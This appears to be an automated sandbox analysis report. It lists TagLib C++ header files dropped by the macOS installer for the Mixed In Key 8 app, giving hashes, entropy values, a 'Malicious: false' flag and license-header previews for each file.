SHA1:	4489D88570E7B54DBF230F88732F02639E556321
SHA-256:	42773EEDDFB23A34D888EEE47698838733F933E248768B05EE197D547362DF9C
SHA-512:	F143197C1D5EF9AFF32A6A9AB698F8018DC491E1F1CEA32E6D86DEF21B48E22296D31BDA632744B7B2BF4C099527D0AD85127AF60D5842EAD78CB893450FF1A4
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eXsXNa Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7498
Entropy (8bit):	4.344419838426909
Encrypted:	false
SSDEEP:	192:LVrCGF337RiZY0P0/kzan06XbUcwBEE8WY90zX0ovwE:Lj7QY4J
MD5:	5183A9B294DD23F5A7BC17144CA2B91F
SHA1:	0052672CE3219153094B1246C896A1826979DCF7
SHA-256:	F7232DEFB76520CEC686BE74D96A4B93FC34C00750E2B38928BCCBD5DACF8369
SHA-512:	E93DF04FE7A001BB15992D2715A24510EA755D268AD03D8AEBBED36D10E868771E46AA66BAB04CED9B1FC5B096CA24C7C5DDA31D1F43A34EE6FE79EB1466ED8E
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_egVWoh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5886
Entropy (8bit):	4.39132784557351
Encrypted:	false
SSDEEP:	96:kobKIPpSeo35Ha+k2lMTTI6cM8zuOgkbT2GXs+FzNmSa/Ijsb59zxEnjyoqFNe6+:LXPpSeO56+BaTTI6cM8zuOgkbT2G8uz1
MD5:	365E9E023441582C5C0E096501FCEC17
SHA1:	02A4AD2036857ADE3E313080E5ED55E6D6F4D0AC
SHA-256:	7F66D695B9F98165378DBDCFD09B11649F68DFD02075C4184F13C72D3D80335D
SHA-512:	C18A1C46EF75EDA2F6EE84A6336DACD0389CDE9D922D9DB9575AEBA16FDE75E31CFBC2EC32D15825A05B5C30CCA92518FDBF92490C0E6CA84B1A3A8DD33EAA84
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eje0YG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7748
Entropy (8bit):	4.377092130127323
Encrypted:	false
SSDEEP:	192:L9bylmPioLxQLEQ3OO7OEgGytQUKd1uaI0LIVsW25BBZ902902WpQXIeseKkIkcn:LJLWnl//ytKtWQE
MD5:	1974BE473B60FD79D10E7284B9C2BCA3
SHA1:	C5A11CDD5EA5BB91ED91AAFE5402CAAE6EB0F865
SHA-256:	85DF4C564560B5A491FE18B64AD9370EEC49D8FB720B734C9E4FDA31C38E5D68
SHA-512:	7B6B62875B7944C380AE814D6DEE273233DBE7117F2EC8B4B6E781BDF2C1BA626B7B2B5A719788D0146DDB8ED471E340D16AFAD9A1B33929367F5F303B7D1A49
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_gQNfZi Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	8914
Entropy (8bit):	4.348664929741424
Encrypted:	false
SSDEEP:	192:l9Gblgin3MsydODsYnDFGIuhIboXiqWMKrsjtsDe/8NMyB1NrBPpLNFQNwuNNKFe:lQVZquIqTVRLEVSe
MD5:	856E64C3F8DF696B4A8CB76EB18E85CD
SHA1:	8FAA8569768416F837CD30B176BA40BD328C6C55
SHA-256:	79382C647AE54070EBECA9949A1C7D2955EBE22AC0211915F9E4171E35F5D34A
SHA-512:	467211EAEDE0B3F0196D8B52C01477B6F68C88B3826165BC894C1F556A1DA17C070A9F07331DC7DCD1FE15B485F265FFF70E7FAB843C437796A5C1C5500F1A65
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2013 by Lukas Krejci. email : krejclu6@fel.cvut.cz. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_iWaP6V Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2817
Entropy (8bit):	4.276807317676327
Encrypted:	false
SSDEEP:	24:1ekb7bfy9lOkHYg/TbVI2+RymPOFesytYkth8J22FknMRTBvFI/FQHlrfG8zzIoC:n3TyBHbKjPOLzTFFI/Cuo/0s/xTR5JG
MD5:	34F23C6F70D857E9589587A5971996F6
SHA1:	6C4E4610057F61622E30E83BEAFC37C7AD7B70C9
SHA-256:	E283B4533474AA0DAA3297CD85926F8F473DCD8452506EDE8CFDCB5B7707DC72
SHA-512:	510F096AB0D3FE53B04A11796BAC04B01BFAF0BC8185EE6968E15BED30B46CB84E42389BA2892E79D07952C2A9C206AD98590F7EF6D22AEA544C1D6A2E3590E2
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2009 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_k6coK9 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	7170
Entropy (8bit):	4.418055674172905
Encrypted:	false
SSDEEP:	192:i9QMUa+hoUfaQRVU+bJjjOuzbJ4bzulA6W/zNXu/vaRGFS0/J6j3/:ienbBJjKcJ3A3
MD5:	B17A7BC2F8EB638DFD98B990ED248808
SHA1:	9D6FCAF159F83B2FCF73C01B6AFD4F6E898ADCC3
SHA-256:	37BA0928E258C51F3A3E3D9AAE133D0CEAD7BDF0B4F35D30EBB44B78DA83BF2A
SHA-512:	C80CDE3B8DAE882A5BC7FD5D42E558EEE3602EFCF1AB9926091AB62DDA4CF2ADF15E3515F7666ADB4D9034355CEBB459B4835092AF23282EC94E2709B274DAE7
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_kMtX0U Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	6282
Entropy (8bit):	4.449816789506483
Encrypted:	false
SSDEEP:	96:dCbeZZbIw2I8RqhqQYhHnlFJpK7GmxfXU0UwcFczFVYbjbd0BK+G:0iZsRSqQYNnlFJQnfXQv
MD5:	B0E9BCA6211313E42B32D2E2E1B421AC
SHA1:	307FDCC52F555E2072B31283FCE6D6B8C2C21A83
SHA-256:	47D442813BB351B52DDC6186FAEF3150BF01C1E3C922EA6B6C4C7ADFF2C76229
SHA-512:	725EF5C629AC3E68DE5D465CCFEF56F0AA65212C4D8460245F86C836C269BE184BDF25C4C062741CF4E3B6548F41C4C66A4AF3A83F0CD34D35DD00490D766B32
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2007,2011 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_l1zvMt Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	2609
Entropy (8bit):	4.236914883635004
Encrypted:	false
SSDEEP:	24:ikb7bfy9lOkHYg/TbVI2+RymPOFeskH8JlnMeIWJgAnBxCf/YJ3/ajstrCcG:F3TyBHbKjPOLD/fBcf/U3/aIPG
MD5:	5AAF2C4B5A3B802C1415D0470052FF25
SHA1:	CF0B8E3295D8CF5447FCCCEE4AAFDBAD4E9CA341
SHA-256:	0ADDF57A4EA7AE942BA96107287CFC7E03866A1271D6EECCE098129CEE958D56
SHA-512:	932B5A781EE2E4A38321510061C6A7BF4552DE75807517BBBF6BB07032CFCA8644701AB27AAC305CF27B6ED89C1289056CD3D63684559F940FA0704BD470892D
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2010 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_lKQxlz Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4926
Entropy (8bit):	4.344956732648442
Encrypted:	false
SSDEEP:	96:kobRy6ivkNlMpw+ST4eezyR9++GDyEBWIE6BBoZaXE:LM6ivkNapw+84XzyR9++GDyEBWIE6BBk
MD5:	300F31911AE03B34D9138C3B1EE879F2
SHA1:	85B7731658ED349BD45F7F6EA0473845B8DF83EA
SHA-256:	7F5917B42F2E7CCA6178E5B711466A34870605E599677918C0677FDB9F93BABC
SHA-512:	136F911E1F8D0CB55856DDF11F0CEBAE948DEBE8C9B60C55EE25AA1593294E6463EB95D55C01370D5AFD92D076C16D458A3528DE24AEE4A8D7513B3794D659FC
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_lnR1Sf Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4267
Entropy (8bit):	4.2664145597461705
Encrypted:	false
SSDEEP:	96:CzjbsaxUiCiulMpw+ST4eezyR9++GUsCIA0h:mIaxUiCiuapw+84XzyR9++GJCIA0h
MD5:	195F1A6901FA93B1238CEFB5F6631B63
SHA1:	919BB9B8C6EEC51448C2A7D77A68C71EE5378C91
SHA-256:	E3918EFA339A679C947EA37B6B4187803401A564256A2A6BE29DEF782740E200
SHA-512:	5BD4B1A951710B038EA650124AA8AE818A23B608CFAF41D0D9DD6B45B65E50D283C57F4B75514EC92F5BFBEE1D8DA7CF447F0B451DCB97EDABD2803FC5D37CD3
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2006 by Luk.. Lalinsk.. email : lalinsky@gmail.com.. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A P

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_m3vaBA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	5028
Entropy (8bit):	4.275995511560157
Encrypted:	false
SSDEEP:	96:tH/b/Kr4l98shACU6s6MA1UKq163QzJNWmzJpzpfFiE0g:JzKrK9GF8KKq163QzJNWmzJpzpfEEB
MD5:	D4A5560343CFF6D5D456F3330C36AEAA
SHA1:	A75E5F3D01B2718D490197F946FB26EF3E6B13D7
SHA-256:	8F0938D05DD38DADBE7580578BDE428FC57EEE57F2288C03252587BAA70CAFCD
SHA-512:	973D3FEE4DCA1BA69B109D308D3CFBF259021559F2EF4926FF7EED95F15037752A2723CDFFD168B8A4156D020FE9AE27E1BB7F8D5B8F1612BEC174D75B2177FA
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2012 by Luk.. Lalinsk.. email : lalinsky@gmail.com.. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. (original Vorbis implementation).***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A P

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_mgMO2q Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	6277
Entropy (8bit):	4.433224552639377
Encrypted:	false
SSDEEP:	192:6s0ZfIhhaKvJo6zzaPDJIO0aUQbXzwb1aTkGqvy2zQ:6sZtAk6
MD5:	B1D4CD11E75EEBE0A13BFFA095E0A2A7
SHA1:	A199F33B7AD09183151B696364CD15C508068843
SHA-256:	266D1779D269F214AEF490A0D2A2542328698D1187029573FF70693C05BCA08C
SHA-512:	53B17CC3275F22E41DE1F9E8AED7B36D9E52347B12583FD2ACFD9F1E0715CA0A2191925F6DE17E1057503A6CB418624442D9EB972500529B8E832B7D89BE7B04
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org.. copyright : (C) 2006 by Urs Fleisch. email : ufleisch@users.sourceforge.net. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser Gen

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_pNEyuA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	4174
Entropy (8bit):	4.288674519278943
Encrypted:	false
SSDEEP:	96:XDYGb9porbRvWK2VxLfDur70hlM1L+0qcRNBQYXkJP:Fxp6bRvWK2VxLLur70ha1L+0qcRNBQN5
MD5:	C7245A68235F8F6E0B6833F303BC2CD7
SHA1:	F6B964568827A812A704E148CB38C5207ABCAC60
SHA-256:	0BF35D569C3FDFF7520A36511F6AE8437AC5EE8B738E4AEB113B900674257F13
SHA-512:	559AAE81E5853712249CB9673BCB9499E005E2DB36192747271E4B235831104D7C259AE0DBB54DA2EAA75F0A08CE59286D31C5B37597B708CA6EC9479DA14033
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2003 by Ismael Orenstein. email : orenstein@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_pbG59Q Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	5931
Entropy (8bit):	4.443131080663439
Encrypted:	false
SSDEEP:	96:mJbgjKKXPv17+Roqsh+SModsqSNvHEOHIPbJdOObJp7WEa8MKNNLa10:i1QPv1rV5qqSNPbHIPbJdOObJp768MK9
MD5:	ECF010013511A11E41E40A1890618E4E
SHA1:	24D677A7DE2FABEA3FC5C44D9429978B648EBF8A
SHA-256:	F20C43AC6BC65FB682840827F960879F696396CC94C346217E26A7882A6B80B1
SHA-512:	03C836A5E28D5B059E18278D06CE149410633ACAFDCA275BA0C7CD1AF17B71CDA441BFB3885DC6C28EA4F4B199B19E94FB448F0E30E485C4A9476A3FA2EB8722
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_psXC92 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	9649
Entropy (8bit):	4.464446446381054
Encrypted:	false
SSDEEP:	192:LvkHs+OuXVxZlIS6gSASOJbj5qOfYxfbJxObJZD13uxAfM68VuIeU1JUQiX/YQK3:LBuXPyYFfYdJCJZ5+SjKyBK5F
MD5:	A708924EC63C608B8B583B75EF4A6A08
SHA1:	46E1F9CC6EC18D22F2A8AEC0BF10A8F880E076C7
SHA-256:	31BEC66202BDD9814E34C3908855D072892226728C209E67DE87FC128CC815E1
SHA-512:	AC18B399749C5A1631DB1979D052C6ABB5CE8A1ECD6384B1710F5597FF2850F2B999C3EC94C0D069010DAC37A35CDF53634BEB3D2D62D904CC685261E37C460D
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_rBPejr Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, ASCII text
Category:	dropped
Size (bytes):	21347
Entropy (8bit):	4.523654126834453
Encrypted:	false
SSDEEP:	192:LY3uaUEe94A+D99T69TR9ax9c79H7cyQa9UBVp40lsfsipwlVR1n2ajRT/UYbOFH:L9jEeWJ7/iHD0XM4I/ow
MD5:	DC27E728F62ABE8B52DFE02EE4288429
SHA1:	D9C6162ED75C4D6E5AAB8AB1AAD5C7304E462949
SHA-256:	752EB07329F719E3D35325703622A3E5169E45EAB6B4A43F8D57DECF60F4F220
SHA-512:	1428F0DB1FE657324EE4257CAF2D1AF6A8FF0C71B1CC18C53C877A11CD03CA3C97F9413C4CD9007D236ECC279F38E921C7A7C31A257EC38398BFCF9BEE4911ED
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_rXLLjv Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4673
Entropy (8bit):	4.552283333047044
Encrypted:	false
SSDEEP:	48:d3TyBHbKjPOZIzTVQplFTHj+XnbmnRFlSaGF+vf4ilBh9WOMQ4sBb:dCbOx4Ra3bmnJ9vf9/kQDb
MD5:	2FA515C5501E1377E52C8BF65D7C13F7
SHA1:	4DEF98B2D4D6A03FCFB65281F432B1F53DCFDF72
SHA-256:	406E5FFD3E90C93CA8DE7150F0F8BCCBC1374FFF348A951A33203FBC5A9DC7E4
SHA-512:	C51C24C3C53CE73DA033CB1282095104BA7F8C5E3A3515B41656DBE18C204E2F6947B357674D68EFDBF03A258545BD5FE75A55CCAE6D5CC435A5E0E4C735F094
Malicious:	false
Preview:	/************************************************************************. copyright : (C) 2007,2011 by Luk.. Lalinsk.. email : lalinsky@gmail.com. **********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU . Lesser General Public License for more details. .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_sFyz2w Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C++ source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	4456
Entropy (8bit):	4.258699137018649
Encrypted:	false
SSDEEP:	96:YdtbvtsEiUkhGIlMpw+ST4eezyR9++GUsCmANNan:yjtsEiUkhGIapw+84XzyR9++GJCmANNc
MD5:	5181CAC5CD48E24948226BCD70DF89B1
SHA1:	F4E9C66823F4812B08D6B4DC8F781213BC1F737D
SHA-256:	E5F2E6997C1EC4ACDA8BBBECA702CB4E6C1F0357A94A69E8FECB99BB70501F4F
SHA-512:	95B83F3F093947150FD61BC53DE22BD70385B54154E274417F3F72356801F0EC4831453BC801D2A6CDEF93B71344CD740DD0A464FF311155A95D2268E5CE9553
Malicious:	false
Preview:	/*************************************************************************. copyright : (C) 2010 by Alex Novichkov. email : novichko@atnet.ru.. copyright : (C) 2006 by Luk.. Lalinsk.. email : lalinsky@gmail.com. (original WavPack implementation). ***********************************************************************/../************************************************************************. This library is free software; you can redistribute it and/or modify . it under the terms of the GNU Lesser General Public License version . 2.1 as published by the Free Software Foundation. . . This library is distributed in the hope that it will be useful, but . WITHOUT ANY WARRANTY; without even the implied warranty of . MERCHANTABILITY or FITNESS FOR A PAR

